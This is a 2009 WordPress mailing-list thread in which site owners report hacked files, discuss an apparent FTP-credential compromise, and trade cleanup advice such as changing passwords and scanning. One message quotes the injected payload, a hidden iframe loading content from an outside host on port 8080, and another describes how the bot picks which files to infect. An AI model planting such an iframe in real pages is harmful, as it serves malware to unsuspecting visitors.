[wp-testers] Default.widgets.php Hacked? What to do?

Chris Carter carter.chris at gmail.com
Thu Jul 23 22:22:32 UTC 2009


you might be in trouble...

On Thu, Jul 23, 2009 at 5:08 PM, Kirk M <kmb42vt at gmail.com> wrote:

> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
> sites for awhile rather than Windows at least until I get everything changed
> around and my Windows parition fully scanned. I have several FTP accounts
> configured, many are for other site owners who ask me to maintain their WP
> powered sites. It definitely wouldn't do to have those get hacked.
>
>
> On 07/23/2009 05:50 PM, Chris Carter wrote:
>
>> Change your pwds and scan away..  I used cpanel file manager for a while
>> to
>> make sure they stopped attacking .. looking at logs, it hits and is tagged
>> with googlebot, but the IP's are strange
>>
>> Anyway, This virus looks for files with:
>>
>> index*.*
>> default*.*
>> main*.*
>> home*.*
>>
>> (I built a static php includes site, and only files named like the above
>> were affected)
>>
>> Also might want to check your CGI-BIN for files that look suspicious
>>
>> It's basically is a bot that logs in, finds any files in all directories
>> that start with the above
>>
>> ...funny thing was that somtimes where they inject it, PHP code throws
>> errors. They need to revise their bot to work outside the<? tags :)
>>
>> -Chris
>> 314media.com
>>
>> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsingh at gmail.com
>> >wrote:
>>
>>  Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>>
>>> On Fri, Jul 24, 2009 at 2:48 AM, dinu<hello at offlineblog.net>  wrote:
>>>
>>>> I had to restore from backup. the entire blog
>>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>>> page. But then I found hidden iframe codes on all of my pages (
>>>> including
>>>> pages after login )
>>>>
>>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>>> would think its not a wordpress issue.
>>>>
>>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsingh at gmail.com
>>>> wrote:
>>>>
>>>>  2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>>>>
>>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
>>>>> Dunbar<josh2007 at findingjesustoday.com>  wrote:
>>>>>
>>>>>> What version of wordpress are you running?
>>>>>>
>>>>>> --------------------------------------------------
>>>>>> From: "Chris Carter"<carter.chris at gmail.com>
>>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>>> To:<wp-testers at lists.automattic.com>
>>>>>> Cc:<wp-testers at lists.automattic.com>;<
>>>>>>
>>>>> wp-hackers at lists.automattic.com>
>>>
>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>>
>>>>>>  I keep getting hacked with that code inserted into
>>>>>>>
>>>>>> admin/default-filters
>>>
>>>>
>>>>>>> Chris Carter
>>>>>>> President
>>>>>>> 314media.com
>>>>>>> 314-714-5448
>>>>>>>
>>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsingh at gmail.com>
>>>>>>>
>>>>>>  wrote:
>>>>>
>>>>>>
>>>>>>>  I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>>> inserted randomly :
>>>>>>>>
>>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>>
>>>>>>>> How to prevent further hacking? I am currently replacing all the
>>>>>>>>
>>>>>>> files
>>>
>>>> affected since all of them affected at a certain date. I am on a
>>>>>>>> shared hosting and only one blog got attacked.
>>>>>>>>
>>>>>>>> Regards
>>>>>>>> Navjot Singh
>>>>>>>> _______________________________________________
>>>>>>>> wp-testers mailing list
>>>>>>>> wp-testers at lists.automattic.com
>>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>>>
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> wp-testers mailing list
>>>>>>> wp-testers at lists.automattic.com
>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>>
>>>>>>
>>>>>> _______________________________________________
>>>>>> wp-testers mailing list
>>>>>> wp-testers at lists.automattic.com
>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>
>>>>>>  _______________________________________________
>>>>> wp-testers mailing list
>>>>> wp-testers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> With Love
>>>> Dinu
>>>>
>>>> http://chromestory.com
>>>> http://offlineblog.net
>>>> _______________________________________________
>>>> wp-testers mailing list
>>>> wp-testers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>
>>>>  _______________________________________________
>>> wp-testers mailing list
>>> wp-testers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>
>>>  _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>


More information about the wp-testers mailing list